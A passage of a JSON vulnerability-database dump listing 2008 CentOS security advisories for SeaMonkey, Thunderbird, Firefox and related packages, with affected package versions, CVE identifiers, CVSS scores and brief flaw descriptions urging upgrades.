"ia64", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390x", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-26.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-26.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-nspr-devel", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-26.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390x", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.centos3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "s390", "packageName": "seamonkey-nss", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.centos3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.centos3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "s390", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-26.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3.centos3", "arch": "ia64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.centos3.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-26.el4.centos", "arch": "ia64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-26.el4.centos.ia64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2008:0882\n\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\nCVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A\nweb page containing specially crafted content could potentially trick a\nSeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\nCVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page\ncontaining specially crafted JavaScript code could move the content window\nwhile a mouse-button was pressed, causing any item under the pointer to be\ndragged. This could, potentially, cause the user to perform an unsafe\ndrag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped\nfrom JavaScript code. This flaw could allow malicious JavaScript to bypass\nor evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015264.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015265.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015268.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015269.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015275.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015276.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015278.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015279.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0882.html", "edition": 1, "reporter": "CentOS Project", "published": "2008-09-24T14:22:25", "title": "seamonkey security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-27T11:03:41", "href": "http://lists.centos.org/pipermail/centos-announce/2008-September/015264.html", "id": "CESA-2008:0882", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:42", "references": ["https://rhn.redhat.com/errata/RHSA-2008-0908.html", "http://pasi.pirhonen.eu/"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "s390x", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "ia64", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5.centos", "arch": "i386", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.17-1.el5.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5.centos", "arch": "x86_64", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.17-1.el5.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "i386", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "x86_64", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4.centos", "arch": "s390", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-16.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.17-1.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5.centos", "arch": "any", "packageName": "thunderbird", "packageFilename": "thunderbird-2.0.0.17-1.el5.centos.src.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2008:0908\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code as the user running\nThunderbird. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was\ndisplayed. An HTML mail message containing specially crafted content could\npotentially trick a Thunderbird user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious JavaScript\nto bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the above\nissue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of cancelled\nnewsgroup messages. If the user cancels a specially crafted newsgroup\nmessage it could cause Thunderbird to crash or, potentially, execute\narbitrary code as the user running Thunderbird. (CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which\nresolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015292.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015293.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015295.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015296.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015307.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015308.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0908.html", "edition": 1, "reporter": "CentOS Project", "published": "2008-10-03T18:55:22", "title": "thunderbird security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-10-06T15:44:07", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015292.html", "id": "CESA-2008:0908", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:59", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2008-0879.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageName": "devhelp-devel", "packageFilename": "devhelp-devel-0.10-0.10.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "s390x", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageName": "devhelp-devel", "packageFilename": "devhelp-devel-0.12-19.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "x86_64", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "any", "packageName": "devhelp", "packageFilename": "devhelp-0.10-0.10.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "any", "packageName": "devhelp", "packageFilename": "devhelp-0.10-0.10.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageName": "devhelp", "packageFilename": "devhelp-0.12-19.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageName": "devhelp", "packageFilename": "devhelp-0.12-19.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss-tools", "packageFilename": "nss-tools-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "any", "packageName": "devhelp", "packageFilename": "devhelp-0.12-19.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "any", "packageName": "devhelp", "packageFilename": "devhelp-0.12-19.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageName": "devhelp", "packageFilename": "devhelp-0.10-0.10.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "i386", "packageName": "yelp", "packageFilename": "yelp-2.16.0-21.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "x86_64", "packageName": "devhelp", "packageFilename": "devhelp-0.12-19.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "x86_64", "packageName": "yelp", "packageFilename": "yelp-2.16.0-21.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.12.1.1-1.el5.centos.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.2-3.el5.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.2-3.el5.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el5.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.2-5.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageName": "devhelp-devel", "packageFilename": "devhelp-devel-0.12-19.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.12-19.el5", "arch": "i386", "packageName": "devhelp-devel", "packageFilename": "devhelp-devel-0.12-19.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "any", "packageName": "yelp", "packageFilename": "yelp-2.16.0-21.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.16.0-21.el5", "arch": "any", "packageName": "yelp", "packageFilename": "yelp-2.16.0-21.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageName": "xulrunner-devel-unstable", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.12.1.1-1.el5.centos.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.12.1.1-1.el5.centos.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.2-3.el5.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el5.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.2-3.el5.centos", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el5.centos.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "ia64", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.ia64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.12.1.1-1.el5.centos.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "s390", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.0.2-3.el4.centos", "arch": "any", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el4.centos.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.12.1.1-1.el5.centos.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageName": "devhelp", "packageFilename": "devhelp-0.10-0.10.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.12.1.1-1.el5.centos.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.0.2-3.el5.centos", "arch": "x86_64", "packageName": "firefox", "packageFilename": "firefox-3.0.2-3.el5.centos.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageName": "devhelp-devel", "packageFilename": "devhelp-devel-0.10-0.10.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "any", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.2-5.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "any", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.2-5.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "x86_64", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.0.2-5.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5.centos.1", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.12.1.1-1.el5.centos.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.0.2-5.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.0.2-5.el5", "arch": "i386", "packageName": "xulrunner-devel-unstable", "packageFilename": "xulrunner-devel-unstable-1.9.0.2-5.el5.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2008:0879\n\n\nMozilla Firefox is an open source Web browser.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code as the user running Firefox.\n(CVE-2008-4058, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062,\nCVE-2008-4063, CVE-2008-4064)\n\nSeveral flaws were found in the way malformed web content was displayed. A\nweb page containing specially crafted content could potentially trick a\nFirefox user into surrendering sensitive information. (CVE-2008-4067,\nCVE-2008-4068)\n\nA flaw was found in the way Firefox handles mouse click events. A web page\ncontaining specially crafted JavaScript code could move the content window\nwhile a mouse-button was pressed, causing any item under the pointer to be\ndragged. This could, potentially, cause the user to perform an unsafe\ndrag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in Firefox that caused certain characters to be stripped\nfrom JavaScript code. This flaw could allow malicious JavaScript to bypass\nor evade script filters. (CVE-2008-4065)\n\nFor technical details regarding these flaws, please see the Mozilla\nsecurity advisories for Firefox 3.0.2. You can find a link to the Mozilla\nadvisories in the References section.\n\nAll firefox users should upgrade to this updated package, which contains\nbackported patches that correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015266.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015267.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015271.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015272.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015277.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-September/015280.html\n\n**Affected packages:**\ndevhelp\ndevhelp-devel\nfirefox\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\nxulrunner\nxulrunner-devel\nxulrunner-devel-unstable\nyelp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0879.html", "edition": 1, "reporter": "CentOS Project", "published": "2008-09-24T14:24:39", "title": "devhelp, firefox, nss, xulrunner, yelp security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-4063", "CVE-2008-4067", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-09-28T00:42:21", "href": "http://lists.centos.org/pipermail/centos-announce/2008-September/015266.html", "id": "CESA-2008:0879", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:51", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageFilename": "devhelp-0.10-0.10.el4.x86_64.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-26.0.1.el4.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.24.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.24.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "src", "packageFilename": "devhelp-0.10-0.10.el4.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "src", "packageFilename": "devhelp-0.10-0.10.el4.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "src", "packageFilename": "devhelp-0.10-0.10.el4.src.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-1.0.9-26.0.1.el4.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageFilename": "devhelp-0.10-0.10.el4.i386.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.24.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.0.1.el3.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-26.0.1.el4", "arch": "x86_64", 